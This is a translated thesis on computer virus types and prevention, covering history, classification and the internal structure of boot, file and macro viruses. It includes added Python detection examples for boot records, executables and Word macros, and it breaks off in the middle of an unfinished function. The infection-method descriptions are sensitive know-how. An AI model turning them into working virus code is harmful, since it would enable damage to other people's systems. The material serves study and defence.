Some Types of Computer Viruses and Methods of Prevention
TRANSCRIPT
8/13/2019 Mot So Dang Virus May Tinh Va Phuong Phap Phong Chong
1/68
Table of Contents
Introduction ... 3
Acknowledgements ... 4
Chapter 1. OVERVIEW OF COMPUTER VIRUSES ... 5
1.1. INTRODUCTION TO COMPUTER VIRUSES ... 5
1.1.1. Computer viruses and their properties ... 5
1.1.2. Names of computer viruses ... 9
1.1.3. Classification of computer viruses ... 11
1.2. BOOT VIRUSES ... 15
1.2.1. Propagation method ... 15
1.2.2. Classification of boot viruses ... 16
1.2.3. Program structure of a B-Virus ... 18
1.3. FILE VIRUSES ... 20
1.3.1. Propagation method ... 20
1.3.2. Classification of F-Viruses ... 21
1.3.3. Program structure of an F-Virus ... 21
1.4. MACRO VIRUSES ... 23
1.4.1. Definition ... 23
1.4.2. The W97M/Antivi.a macro virus ... 24
1.5. TROJANS ... 26
1.5.1. Definition of a Trojan ... 26
1.5.2. How Trojans infect a machine ... 26
1.5.3. The danger of Trojans ... 28
1.5.4. Classification of Trojans ... 28
1.5.5. Purposes of Trojans ... 29
1.5.6. How Trojans operate ... 30
1.5.7. Ports used by some common Trojans ... 31
1.6. INTERNET WORMS ... 32
1.6.1. General introduction ... 32
1.6.2. Stages in the development of Internet worms ... 35
Chapter 2. IDENTIFYING AND DETECTING VIRUSES ... 44
2.1. VIRUS IDENTIFICATION TECHNIQUES ... 44
2.1.1. Exact pattern matching (signature-based detection) ... 44
2.1.2. Identification by representative code ... 45
2.1.3. String scanning ... 46
2.1.4. Identifying suspicious behaviour ... 48
2.1.5. Continuous monitoring ... 49
2.1.6. Combining the methods ... 49
2.2. VIRUS DETECTION METHODS ... 50
2.2.1. Scanning (scanner) ... 50
2.2.2. Checksum ... 50
2.2.3. Guard ... 51
Chapter 3. VIRUS PREVENTION ... 52
3.1. SEARCHING IN MEMORY ... 52
1/. For B-Viruses ... 52
2/. For RF-Viruses ... 53
3.2. REMOVING VIRUSES AND RECOVERING DATA ... 53
3.2.1. B-Viruses ... 53
3.2.2. F-Viruses ... 54
3.2.3. Trojans ... 55
3.2.4. Worms ... 57
3.3. CREATING A COMPUTER VIRUS ... 58
Conclusion ... 68
Introduction
Computer viruses are today a source of anxiety for people who work in computing, and a source of fear for users whose computers become infected. When their computer is infected, they can only rely on the anti-virus products currently on the market; when those products fail to detect or remove the virus, they are left in a very difficult position, not knowing what to do.
For that reason, a basic understanding of the system, the mechanisms and the operating principles of computer viruses is necessary. On that basis one can take a sound approach to viruses in prevention, checking and disinfection, as well as in analysing and studying a newly appeared virus.
Every operating system has its own kinds of viruses that run on it: for DOS there are DOS viruses, for Windows there are Windows viruses. The development of computing is tied to the development of viruses: whenever a new piece of software, a new program or a new operating system appears, new viruses appear along with it, and anti-virus programs follow. This is why the study, identification and detection of viruses is needed, so that suitable measures can be taken to block and prevent them with the best possible results.
Acknowledgements
I wish to express my deep respect and gratitude to Assoc. Prof. Dr. Trinh Nhat Tien and the lecturers of the Faculty of Information Technology, Hai Phong Private University, who guided and encouraged me while I was writing this thesis. I thank the teachers of the university for creating the conditions that helped me complete it. I also thank my family and friends for their help, encouragement and support during the work.
As time was short and my experience is limited, shortcomings are unavoidable. I look forward to comments from the teachers and from my friends.
Sincerely, thank you.
Chapter 1. OVERVIEW OF COMPUTER VIRUSES
To detect and remove a computer virus one must first understand its nature. As a general rule, removing a virus mostly means undoing what the virus did. This chapter therefore studies the mechanisms by which viruses operate in order to make their nature clear, so that a program to find and remove them can be built on that basis.
1.1. INTRODUCTION TO COMPUTER VIRUSES
1.1.1. Computer viruses and their properties
1.1.1.1. Definition of a computer virus
1.1.1.2. Properties
Propagation: this is the most important property of every kind of virus. The ability to spread is what gives a virus its power, and it is what distinguishes a virus from other malicious programs that can also damage data and computers but cannot spread by themselves.
Concealment: this property lets a virus evade detection by anti-virus programs and speeds up infection, ensuring its survival. A virus can minimise its size by optimising its code or by using self-compression and decompression algorithms. However, this also means the virus has to reduce its complexity, which makes its code easier for programmers to analyse.
Destructiveness: some viruses lack this property because they were written simply for amusement or to test the ability to spread. Many viruses, however, are highly destructive.
1.1.1.3. History of computer viruses
Computer viruses have a rather long history and have always gone hand in hand with computers. As software and hardware technology advanced, viruses advanced with them; when operating systems changed, viruses changed themselves to fit the new system. Many different sources discuss the origin of computer viruses [1,2,3,4], but most of them trace it back to the game Core War.
1983: The principle of the Core War game
Core War is a battle of wits between two computer programs written by two programmers. Each player places a self-replicating program called an Organism into the computer's memory. Once the game starts, each player tries to destroy the opponent's Organism and replicate their own. The winner is the player who produces the most copies.
Core War was kept private until 1983, when Ken Thompson, the author of the first version of the UNIX operating system, revealed it on receiving one of the highest honours in computing, the A.M. Turing Award. In his lecture he put forward the idea of a computer virus based on Core War. In the same year Dr Frederick Cohen demonstrated the existence of computer viruses.
In May 1984 the magazine Scientific American published a description of Core War and gave its readers instructions for the game; from then on computer viruses appeared, and with them the war between those who write viruses and those who fight them.
1986: The Brain virus
This can be considered the first computer virus in the world. Brain crept from Pakistan into the United States, its first target being the University of Delaware. Another place in the world also described the appearance of a virus: the Hebrew University in Israel.
1987: The Lehigh virus
Lehigh is the name of a virus that appeared in 1987 at the university of the same name. A number of other viruses appeared in this period, notably worm viruses, a nightmare for server systems. The Jerusalem virus caused damage at IBM with a remarkable spread rate: 500,000 copies in one hour.
1988: Viruses spreading over networks
On 2 November 1988, Robert Morris released a virus into the most important computer network in the United States, causing great damage. From then on people began to see how harmful computer viruses could be.
1989: The AIDS Trojan
Trojans, also called Trojan horses, appeared. They are not computer viruses, but they always accompany the concept of a virus. Once attached to a computer, a Trojan steals some information from it and sends it to an address chosen by the owner of the horse, or simply destroys the data on that computer.
1991: The Tequila virus
This was the first virus that specialists called polymorphic. It was a real headache for those fighting viruses and was genuinely hard to remove: it could change its form after each infection, making it very difficult to detect.
1992: The Michelangelo virus
Following the arrival of polymorphic viruses in 1991, the power of computer viruses grew dizzyingly in 1992, with virus writers building extremely complex polymorphism into each virus.
1995: The Concept virus
Nearly ten years after the first computer virus, this was the first virus whose operating principle differed almost completely from earlier ones. Viruses that followed Concept's principle were later called macro viruses; they attack Microsoft's document applications (Word, Excel, PowerPoint).
1996: The Boza virus
When Microsoft moved to Windows 95 and believed that viruses could not attack it, the Boza virus appeared in 1996 and was able to infect Windows.
1999: The Melissa and Bubbleboy viruses
A new step in the development of viruses: the Melissa worm not only combined the features of an Internet worm and a macro virus, it also exploited a tool in daily use, Microsoft Outlook Express. When a computer was infected with Melissa, the worm spread itself without the owner's knowledge.
Within four days Melissa infected 250,000 computers around the world over the Internet, including in Vietnam, causing hundreds of millions of dollars in damage. Melissa proved that the Internet is an effective medium by which a virus can spread across the globe in a few hours.
Also in 1999, the Chernobyl virus, also known as CIH, destroyed the data of millions of computers worldwide, causing nearly 1 billion USD in damage on 26 April 1999.
2000: DoS viruses and Love Letter
This can be considered the most destructive virus incident so far. Love Letter originated in the Philippines, created by a student there; within six hours it infected 20 countries, including Vietnam, reaching 55 million computers and causing 8.7 billion USD in damage.
As for DoS (Denial of Service) viruses, they spread everywhere and lie dormant wherever they have infected. Finally, they attack all at once in a denial-of-service pattern (continuous requests from many computers at the same time, so that the attacked servers can no longer serve and end up refusing new requests) against server systems, either when their operator orders it or at a pre-set time. A telephone system in Spain was the first target.
2001: Winux Windows/Linux, Nimda and Code Red
The Winux Windows/Linux virus marked the viruses able to infect the Linux operating system.
Nimda and Code Red attack their targets by many different routes (server to server, or server to workstation); as late as September 2002 there were still organisations in Vietnam whose networks of hundreds of computers were infected with Nimda. They pointed to a new trend in computer viruses: all in one, with one virus comprising several viruses.
2002: A wave of new kinds of virus
In January 2002 a virus infected .SWF files. In March 2002 the SharpA worm, written in C#, appeared. In May 2002 SQLSpider appeared, attacking programs that use SQL. Perrun infected .JPEG image files. Scalper attacked FreeBSD/Apache web servers.
1.1.2. Names of computer viruses
A virus is generally named by the first researcher who encounters it. The problem is that several researchers may encounter the same new virus, and each names it differently. Competition between security software companies to be the first to name a new virus has led to the common situation today in which a virus goes by many different names.
Disagreement over names and naming schemes creates confusion in the field, which in turn hampers countermeasures and helps viruses spread. This was also a topic of discussion at the global anti-virus conference (Virus Bulletin 2003) held in Toronto, Canada, at the end of September 2003.
In the early 1990s a naming convention was proposed by the Computer Antivirus Research Organization (CARO). Formally introduced in 1991 and amended from time to time, it lays down rules about what may and may not be used in a virus name, and establishes a set of virus attributes such as severity, affected platform and family. Nick Fitzgerald, representing CARO, said when speaking about the current naming system that their rules remain in force.
Technical naming matters to virus specialists, who can tell from the name what kind of virus it is and which version. It matters little to most computer users, who tend to remember viruses by event-related names such as I Love You and Melissa rather than VBS.LoveLetter.A and W97.Melissa.A. In short, disagreements in naming among researchers and security companies give one virus many names. That confuses people, but anti-virus software considers only the characteristics and identifying marks of a virus, not its name, when removing it.
1.1.3. Classification of computer viruses
Roughly speaking, computer viruses are divided into five kinds [1]:
Kind 1: Boot viruses (B-Virus)
Their infection environment is the boot record of a floppy disk and the master boot record or boot record of a hard disk, the area that holds the code used to start the computer. A virus of this kind is activated whenever the computer boots from a disk it has infected. Once woken, it installs itself resident in memory and quietly waits for a chance to spread to other disks through disk access.
Kind 2: File viruses (F-Virus)
These usually infect executable files: .EXE, .COM, .DLL, .BIN, .SYS and so on. They run when an infected executable is executed; they immediately try to infect other files, or install themselves resident in memory and wait for a chance to infect other executables.
Kind 3: Macro viruses
Unlike traditional F-Viruses, their targets are not executable programs but the documents and spreadsheets of application software equipped with a sophisticated macro language, such as Microsoft Excel in Microsoft's Office suite. When such a document (or Excel file) is processed by Microsoft Word (or Microsoft Excel), the macro virus is activated and tries to spread to other Word or Excel files.
Kind 4: Trojans
The term comes from an ancient legend, the war between the Greeks and the city of Troy. Troy was a strong fortress that the Greek army could not break into. They devised a ruse: they pretended to make peace and then presented Troy with a giant wooden horse. Once the horse had been brought into the city, soldiers hidden in its belly came out at night and took the city from within.
That is exactly the method computer Trojans use. First the attacker somehow tricks the victim into running his program. When it runs, it looks just like an ordinary program. In parallel, however, part of the Trojan secretly installs itself on the victim's machine. At some predetermined moment it deletes data, or sends the information the attacker wants to a predetermined address on the network.
Unlike a virus, a Trojan is a piece of program code with no ability to spread at all. It can only be installed when it is activated, and it only reaches another computer when someone deliberately sends it, whereas a virus seeks out victims by itself.
Software containing a Trojan is usually distributed as a utility or as attractive new software, to draw users in. Besides the traditional information-stealing Trojans, some newer terms are used to name Trojans with particular characteristics:
BackDoor: a Trojan which, once installed on the victim's machine, opens a service port through which the attacker can connect remotely to the victim; it then receives and carries out the attacker's commands.
Adware (illicit advertising software) and Spyware: these annoy users by deliberately changing the default home page and search page, or by continually popping up advertising pages while the user browses. They usually slip onto the machine when the user visits unwholesome web sites or software-cracking sites, or come bundled with untrustworthy free software and cracking tools (cracks, keygens).
Kind 5: Internet worms
The Internet worm is a significant advance over the virus. It combines the destructiveness of a virus, the stealth of a Trojan and rapid spread over the Internet. Spreading so fast, worms paralyse whole series of server systems and overload network links.
An Internet worm is usually distributed by searching the address book of the machine it has infected, typically addresses of relatives and customers, then mailing copies of itself to the addresses it finds, usually with the owner of that machine as the sender. The danger is that all of this happens without the user's knowledge; only when they are told they have sent a virus to someone else do they realise their own machine is infected.
Repeating exactly the same process on each victim machine, an Internet worm can spread around the globe exponentially, which explains how Melissa and Love Letter reached tens of millions of computers worldwide within a few hours. The name reflects the way the worms crawl from one computer to another along the branches of the Internet.
Given such fast and wide spread, worm authors usually build in extra features: for example, the worms can be set to attack a chosen address from all the victim machines at once at the same date and time, and such attacks are very hard to resist or recover from. Internet worms can also give their owner access to the victim's computer to do anything a legitimate user of that machine could do.
The notion of an Internet worm also covers viruses that spread over peer-to-peer sharing networks, viruses that spread through chat services and, especially, viruses that exploit software vulnerabilities to spread. Software (especially operating systems and the services running on them) always contains latent bugs (buffer overflows, for example) that are not always easy to find. When a software vulnerability is discovered, viruses capable of exploiting it soon appear, infecting remote computers silently without their owners' knowledge. From those computers the worm crawls on to other computers on the Internet in the same way.
Classifying viruses gives us a sound view of computer viruses, from which effective methods to stop them can be built.
1.2. BOOT VIRUSES
1.2.1. Propagation method
After POST (Power On Self Test), the first sector of the boot disk is read into memory at address 0:07C00h, and a check is made that it is a valid boot sector by looking for the identifier 0AA55h at the end of the sector. This check cannot prevent abuse if someone replaces the boot code with a different program for malicious ends, and that is precisely how a B-Virus spreads.
On a floppy disk the first sector is always the boot sector, so spreading simply means replacing that sector with the virus code.
On a partitioned hard disk, spreading is more complicated: the master boot sector is read first, and only after the active partition has been checked is the corresponding boot sector read. The virus writer can therefore choose either of two places to store the virus code: the master boot sector or the boot sector.
A B-Virus stored in the master boot sector is always the first thing loaded into memory, whichever operating system is used afterwards, so it can spread very widely. The problem is that such a virus must preserve the partition table, since the slightest damage to that area causes hard disk problems.
Storing the virus in the boot sector has the advantage of being able to use the disk parameter table located in that area, and the code that spreads to floppies can be reused for hard disks.
Both methods are used by B-Viruses, but today most of them infect the master boot sector.
The key problem this kind of virus has to solve is the disk's old boot sector (or master boot sector). The virus replaces it with a new boot sector, but it cannot do the old sector's job in full, because that sector contains information about the disk and the virus cannot fully know what the sector has to do. For this reason most B-Viruses do not discard the old boot sector; they hide it somewhere on the disk and, once their installation is done, read it back and hand control to its code (some viruses, however, overwrite the old boot sector's code with their own, keeping only the disk information, without stashing the sector away). The old boot sector then carries on as normal. Choosing where to hide it is itself difficult, because every area of the disk can be modified: the FAT, the root directory and above all the data area. By how they solve the hiding of the old boot sector, B-Viruses can be divided into two kinds, SB-Virus and DB-Virus.
1.2.2. Classification of boot viruses
B-Viruses solve the storage of the old boot sector in one of two ways:
The first is for the virus to store the old boot sector at a fixed location on every disk and accept the risk that the sector may be lost through overwriting, even though the chosen hiding place is the one least likely to be overwritten. This approach is simple, so the program is usually small. Only one sector replaces the old boot sector, which is why this kind is called an SB-Virus (Single Boot Virus).
The second is for the virus to store the old boot sector in a safe location on the disk so as to avoid any possible loss. Since the size of the safe area can be set arbitrarily, the virus usually occupies several sectors and is split into two parts: one in the boot sector and one in the safe area. Because of this, the kind is called a DB-Virus (Double Boot sector).
1/. SB-Virus
Because it accepts the possibility of data loss, the program is compact and occupies only one sector. An SB-Virus normally chooses the places least likely to be written to for storing the old boot sector. On a floppy disk the usual choices are:
- The last sectors of the root directory, since users rarely use up all the entries of the root directory.
- The last sectors of the disk, since when allocating clusters to a file DOS starts looking for free clusters from the beginning of the data area, based on the file's entry in the FAT.
On a hard disk it is simpler: on most disks track 0 holds only the master boot record, in one sector, and the remaining sectors of that track are empty and unused. SB-Viruses and most DB-Viruses therefore choose the empty sectors of this track as their hiding place.
2/. DB-Virus
For most viruses, 512 bytes (the usual size of a sector) is not much room. They solve this by replacing the old boot sector with a fake boot sector whose job is to load the rest of the virus code from disk into memory and hand it control. Only after that part has been installed is the real boot sector loaded into memory. The rest of the virus code can be kept in one of the following places:
- On a floppy disk: it evades DOS by using free clusters, and the FAT entries for those clusters are marked bad so that DOS will no longer use them. A second, better method is to get out of DOS's reach by creating an extra track after the last track DOS can manage (this applies only to floppies). Its drawback is that some floppy drives cannot handle it, and the added track causes errors when the virus tries to spread. The first method is therefore still the more widely used.
- On a hard disk: the virus code can be kept in the sectors after the master boot record, or in the last sectors of the partition after shrinking the partition, or handled as on a floppy (using free clusters and marking them bad in the FAT so that DOS no longer uses them).
In general the program structure of an SB-Virus and a DB-Virus is the same.
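The checks a defender can run against the layout described in 1.2.1 and 1.2.2 (the 0AA55h signature, partition table sanity, a hash of the boot code against a baseline taken while the disk was clean, and a look at the unused sectors of track 0 where SB- and DB-Viruses stash the old boot sector or their remaining code) are shown in the following added example. It is not code from the thesis; the MBR layout is the real one, but the sample sectors, the "replacement" boot code and the 63-sectors-per-track geometry are constructed assumptions for the demo.

```python
import hashlib
import struct
from typing import List, Optional

SECTOR = 512
BOOT_SIG = 0xAA55          # the 0AA55h marker the BIOS checks at the end of the sector
PART_TABLE_OFF = 446       # four 16-byte partition entries follow the boot code
SECTORS_PER_TRACK = 63     # classic CHS geometry (assumption): LBA 1..62 form the track-0 gap


def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte master boot sector into boot code, partition table and signature."""
    if len(sector) != SECTOR:
        raise ValueError("an MBR is exactly 512 bytes")
    signature = struct.unpack_from("<H", sector, 510)[0]
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        # status, CHS start (3 bytes, skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, lba_start, lba_count = struct.unpack_from("<B3xB3xII", sector, off)
        partitions.append({"bootable": status == 0x80, "type": ptype,
                           "start": lba_start, "count": lba_count})
    return {"signature": signature, "boot_code": sector[:PART_TABLE_OFF],
            "partitions": partitions}


def check_mbr(sector: bytes, baseline_sha256: Optional[str] = None) -> List[str]:
    """Return findings about the MBR; an empty list means nothing looked wrong."""
    mbr = parse_mbr(sector)
    findings = []
    if mbr["signature"] != BOOT_SIG:
        findings.append("missing 0xAA55 boot signature")
    if sum(p["bootable"] for p in mbr["partitions"]) > 1:
        findings.append("more than one partition flagged active")
    for i, p in enumerate(mbr["partitions"]):
        if p["type"] != 0 and p["start"] == 0:
            findings.append(f"partition {i} starts at LBA 0 and overlaps the MBR")
    if baseline_sha256 is not None:
        if hashlib.sha256(mbr["boot_code"]).hexdigest() != baseline_sha256:
            findings.append("boot code differs from the recorded baseline")
    return findings


def scan_track0_gap(track0: List[bytes]) -> List[int]:
    """LBA indices of non-empty sectors between the MBR and the first partition."""
    return [lba for lba, s in enumerate(track0) if lba > 0 and any(s)]


def build_mbr(boot_code: bytes, partitions) -> bytes:
    """Constructed MBR for the demo (not taken from any real disk)."""
    code = boot_code.ljust(PART_TABLE_OFF, b"\x00")
    table = b"".join(struct.pack("<B3xB3xII", 0x80 if bootable else 0, ptype, start, count)
                     for bootable, ptype, start, count in partitions).ljust(64, b"\x00")
    return code + table + struct.pack("<H", BOOT_SIG)


# Constructed sample data: a clean MBR whose boot code is just "jmp $", one FAT16 partition
# starting at LBA 63, and the SHA-256 of its boot code recorded while the disk is known clean.
PARTS = [(True, 0x06, 63, 2048)]
CLEAN_MBR = build_mbr(b"\xEB\xFE", PARTS)
BASELINE = hashlib.sha256(CLEAN_MBR[:PART_TABLE_OFF]).hexdigest()

# Constructed "replaced" layout: different boot code in sector 0, the original sector stashed
# in a gap sector of track 0, partition table and signature left intact (as the text describes).
REPLACED_MBR = build_mbr(b"\xB8\x00\x7C\xEB\xFE", PARTS)
TRACK0 = [REPLACED_MBR] + [bytes(SECTOR)] * (SECTORS_PER_TRACK - 1)
TRACK0[5] = CLEAN_MBR


def demo() -> dict:
    return {
        "clean": check_mbr(CLEAN_MBR, BASELINE),
        "replaced": check_mbr(REPLACED_MBR, BASELINE),
        "gap_sectors": scan_track0_gap(TRACK0),
        "no_signature": check_mbr(CLEAN_MBR[:510] + b"\x00\x00"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The baseline hash has to be recorded while the disk is known clean, and it covers only the 446 bytes of boot code; because the text notes that a B-Virus must keep the partition table intact, a changed table is caught only by the structural checks, so store a copy of the table alongside the hash. Modern boot loaders legitimately use some track-0 gap sectors, so a non-empty gap is a lead to inspect, not proof of infection.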
1.2.3. Program structure of a B-Virus
Because it is given control only once, at boot, the virus must find a way to stay alive and be reactivated when needed; in other words it behaves like a pop-up TSR (Terminate and Stay Resident) program. The virus program is therefore divided into two parts: the initialisation part and the body.
Initialisation part
First the virus makes itself resident by copying itself into high memory. Then, to ensure it can pop up, it always hooks interrupt 13h. In addition, to support destruction and obfuscation, it may also hook interrupts 8 and 9. Once initialisation is complete, the old boot sector is read back to its proper place and given control.
Body
This is the important part of the virus, holding the code that mostly replaces the interrupts it hooked. It can be divided into four parts.
+ Propagation part: the main part of the body, replacing interrupt 13h; it spreads by copying the virus onto any disk not yet infected.
+ Obfuscation and camouflage part: once the nature of a virus has been studied thoroughly, detecting and removing it is no longer complicated. Obfuscation makes it harder for the anti-virus side to find and remove the virus and to recover data. Camouflage makes the virus look normal from the outside so that neither anti-virus workers nor users notice it.
+ Destructive part: not strictly necessary, though most viruses have one; a mild one causes small malfunctions and teases the user, a vicious one can destroy the computer's data. A virus may destroy at random or on a timer. A timed virus checks some value (it may use the day, hour, month, year, number of infections or hours of machine operation); when that value equals or exceeds the set threshold it begins its destruction.
+ Data part: stores intermediate information, internal variables used only by the virus, and the old boot sector.
1.3. FILE VIRUSES
1.3.1. Propagation method
Traditional file viruses generally spread only to executable files (usually .com or .exe files). When spreading, a traditional F-Virus must also obey the rule that control must be in the virus's hands before the virus returns it to the infected file (although a few viruses take control only after some instructions of the infected file have run). All of the file's data must be preserved once control belongs to the file.
To date F-Viruses have the following basic propagation methods:
1/. Prepending
Normally this method applies only to .COM files, in which the program always starts at PSP:100h. Exploiting this, the virus inserts its code at the start of the infected file and pushes the whole file down immediately after it.
Advantages: the virus code is easy to write and is used on .COM files. It also makes recovery harder for the anti-virus side, because the whole infected file must be read into memory and written back.
Disadvantages: before returning control to the file the virus must ensure the entry point is PSP:100h, so it has to move the whole program to that address.
2/. Appending
This method is seen in most kinds of F-Virus and its range of infection is wider than the previous one. As the name says, the virus is attached immediately after the infected file. Since the virus code is not at the program's entry point, it repositions the infected file by altering some of the file's data so that the entry point points to its own code.
Advantages: it spreads to every kind of executable, typically .COM, .EXE, .BIN and .OVL; the change to the infected file's data is negligible and seizing control is not hard.
Disadvantages: recovery is easy for the anti-virus side, and locating the virus code in an infected file is hard because the infected file's size is arbitrary.
3/. Cavity (overwriting empty space)
This method is meant to overcome the weakness of the previous two methods, namely that they increase the size of the infected file (a loophole through which the virus is easily detected). Here the virus looks for empty regions inside the file and writes its code there.
Advantages: detection and removal are harder.
Disadvantages: the virus code is hard to write, and the range of infection is narrow because very few files have enough empty space for the virus to overwrite.
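Added example, not code from the thesis: a Python check over the three methods just described. It reads the real MZ (.EXE) header fields to locate the declared load image and the CS:IP entry point, flags a file whose entry point lies in data appended beyond the declared image (the appending pattern of method 2), and compares a file against a fingerprint recorded while it was clean, which also catches prepending and cavity infections because the size, the entry point or the content hash changes. The sample executables, the 32-byte header and the NOP filler standing in for appended code are constructed for the demo.

```python
import hashlib
import struct
from typing import List, Optional

HEADER_SIZE = 32  # the demo's minimal MZ header, padded to two 16-byte paragraphs


def parse_mz(data: bytes) -> dict:
    """Read the MZ header fields needed to locate the load image and the entry point."""
    if len(data) < 28 or data[:2] not in (b"MZ", b"ZM"):
        raise ValueError("not an MZ executable")
    (e_cblp, e_cp, _e_crlc, e_cparhdr, _e_minalloc, _e_maxalloc, _e_ss, _e_sp,
     _e_csum, e_ip, e_cs, _e_lfarlc, _e_ovno) = struct.unpack_from("<13H", data, 2)
    # e_cp counts 512-byte pages; e_cblp is the number of bytes used in the last one (0 = full)
    image_size = e_cp * 512 - ((512 - e_cblp) if e_cblp else 0)
    header_size = e_cparhdr * 16
    entry_offset = header_size + e_cs * 16 + e_ip   # CS:IP relative to the load module
    return {"file_size": len(data), "image_size": image_size,
            "header_size": header_size, "entry_offset": entry_offset}


def header_findings(data: bytes) -> List[str]:
    """Checks that need no prior knowledge of the file."""
    h = parse_mz(data)
    out = []
    if h["entry_offset"] >= h["file_size"]:
        out.append("entry point beyond end of file")
    elif h["file_size"] > h["image_size"]:
        out.append("file larger than the declared load image (overlay present)")
        if h["entry_offset"] >= h["image_size"]:
            out.append("entry point lies inside the overlay")
    return out


def fingerprint(data: bytes) -> dict:
    """What to record for a file while it is known to be clean."""
    h = parse_mz(data)
    return {"size": h["file_size"], "entry": h["entry_offset"],
            "sha256": hashlib.sha256(data).hexdigest()}


def baseline_findings(data: bytes, baseline: dict) -> List[str]:
    """Compare a file against its clean fingerprint; any of the three changes is a finding."""
    h = parse_mz(data)
    out = []
    if h["file_size"] != baseline["size"]:
        out.append("file size changed since baseline")
    if h["entry_offset"] != baseline["entry"]:
        out.append("entry point moved since baseline")
    if hashlib.sha256(data).hexdigest() != baseline["sha256"]:
        out.append("content hash changed since baseline")
    return out


def build_exe(code: bytes, overlay: bytes = b"", entry: Optional[int] = None) -> bytes:
    """Constructed minimal MZ file: 32-byte header, code, optional trailing bytes."""
    image_size = HEADER_SIZE + len(code)
    e_cp, e_cblp = (image_size + 511) // 512, image_size % 512
    entry = HEADER_SIZE if entry is None else entry
    cs, ip = divmod(entry - HEADER_SIZE, 16)
    fields = (e_cblp, e_cp, 0, HEADER_SIZE // 16, 0, 0xFFFF, 0, 0, 0, ip, cs, 0x1C, 0)
    header = (b"MZ" + struct.pack("<13H", *fields)).ljust(HEADER_SIZE, b"\x00")
    return header + code + overlay


# Constructed samples. The clean program is "mov ah,4Ch; int 21h" (DOS exit) padded to 64 bytes.
CLEAN_CODE = b"\xB4\x4C\xCD\x21".ljust(64, b"\x90")
CLEAN_EXE = build_exe(CLEAN_CODE)
CLEAN_BASELINE = fingerprint(CLEAN_EXE)
# Appended variant: 200 filler bytes after the image and CS:IP redirected to them, which is the
# "attach after the file and repoint the entry" shape of method 2. The filler is NOPs, not code.
APPENDED_EXE = build_exe(CLEAN_CODE, overlay=b"\x90" * 200, entry=HEADER_SIZE + len(CLEAN_CODE))


def demo() -> dict:
    return {
        "clean_header": header_findings(CLEAN_EXE),
        "clean_baseline": baseline_findings(CLEAN_EXE, CLEAN_BASELINE),
        "appended_header": header_findings(APPENDED_EXE),
        "appended_baseline": baseline_findings(APPENDED_EXE, CLEAN_BASELINE),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The header-only checks are heuristics: an appender that also enlarges e_cp/e_cblp to cover its code produces no overlay finding, and a cavity infection changes neither the size nor (necessarily) the entry point. The fingerprint comparison is what catches all three methods, which is why the thesis's later checksum approach records such values while the files are known clean.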
1.3.2. Classification of F-Viruses
TF-Virus (Transient File Virus): this kind is not memory-resident and hooks no interrupts; when the infected file is executed it takes control and tries to spread to as many other files as it can.
RF-Virus (Resident File Virus): this kind becomes resident by various techniques and hooks interrupts, chiefly interrupt 21h; when that interrupt is invoked for certain file functions, the virus spreads.
1.3.3. Program structure of an F-Virus
1/. TF-Virus
It has four parts: propagation, obfuscation, destruction and data.
Propagation part: the main part of the virus; it spreads by copying and attaching itself to other files it finds while it has control. Since this kind is not resident, it tries to infect as many files as possible while it holds control.
Obfuscation part: makes the virus code complex and hard to understand, hampering anti-virus researchers in finding and removing the virus and recovering data.
Destructive part: as for the B-Virus.
Data part: stores intermediate information, internal variables used only by the virus, and the infected file's data, which is restored to the file before control is handed back to it.
2/. RF-Virus
Because it is resident and hooks interrupts like a B-Virus, this kind also has two main parts: initialisation and body.
Initialisation part: first the virus makes itself resident, by copying itself into memory or by using DOS's resident-program functions. Then, to ensure it can pop up, it always hooks interrupt 21h. In addition, for destruction and obfuscation, it may also hook interrupts 8, 9, 13h and others. Once initialisation is complete, it restores the old data and returns control to the infected file.
Body: structured like the TF-Virus, with the same four parts: propagation, obfuscation, destruction and data. But because this kind is resident, propagation is carried out on the files that request services through interrupt 21h (which the virus has hooked). Its obfuscation and camouflage are also more sophisticated than a TF-Virus's, since it can monitor the system while resident.
1.4. MACRO VIRUSES
1.4.1. Definition
In essence a macro virus is one or more macros (written in WordBasic, ExcelBasic or Visual Basic) that can be activated and spread when the user works with a file that contains them. The first target of a macro virus is the default template loaded whenever Word or Excel starts (for Word, the file NORMAL.DOT); from there it goes on to infect other files in later sessions.
Normally macros run only when the user deliberately runs them. Macro viruses, however, can run automatically when their name matches one of the automatic macros, or matches a standard Word or Excel command. This is how macro viruses get themselves activated and spread under certain conditions.
Examples of standard commands in Word are FileClose, FileOpen, FileSave and FileSaveAs, and there are five automatic macros. These run automatically when the corresponding action takes place.
Name        Runs automatically on
AutoClose   Closing the document
AutoStart   Starting Word
AutoExit    Exiting Word
AutoNew     Creating a new document
AutoOpen    Opening a document
Thus, to spread, a macro virus must always have at least one macro that runs automatically. That macro contains code that spreads by copying the entire virus code into other files. A macro virus may also have destructive, obfuscation and camouflage parts.
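Added example, not part of the thesis: a small Python triage of exported VBA module text that reports procedures named after the five automatic macros or the four standard commands listed above, and whether the module refers to the global template. It matches NORMAL.DOT from the text and also NormalTemplate, the Word object-model name for the same template (an assumption beyond the text). The two modules are constructed samples; the template reference in the first is a harmless Debug.Print, chosen only so the detection has something to match.

```python
import re
from typing import Dict, List

# The five auto-executing macro names and the four standard commands listed in the text.
# VBA identifiers are case-insensitive, so the sets are kept in lower case.
AUTO_MACROS = {"autoclose", "autostart", "autoexit", "autonew", "autoopen"}
COMMAND_MACROS = {"fileclose", "fileopen", "filesave", "filesaveas"}

# VBA procedure headers: optional scope keyword, then Sub/Function and the name.
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)",
                     re.IGNORECASE | re.MULTILINE)
# References to the global template: NORMAL.DOT on disk, NormalTemplate in the object model.
TEMPLATE_RE = re.compile(r"NORMAL\.DOT|NormalTemplate", re.IGNORECASE)


def analyse_vba(source: str) -> Dict[str, object]:
    """Classify the procedures in one exported VBA module."""
    procs = PROC_RE.findall(source)
    auto = [p for p in procs if p.lower() in AUTO_MACROS]
    hooks = [p for p in procs if p.lower() in COMMAND_MACROS]
    touches_template = TEMPLATE_RE.search(source) is not None
    return {
        "procedures": procs,
        "auto_exec": auto,
        "command_hooks": hooks,
        "touches_normal_template": touches_template,
        # an auto-run or command-hooking macro that also reaches for the global template is
        # the combination a macro virus needs to survive from one Word session to the next
        "suspicious": bool(auto or hooks) and touches_template,
    }


def triage(modules: Dict[str, str]) -> List[str]:
    """Names of the modules (e.g. from one document's VBA project) that deserve a closer look."""
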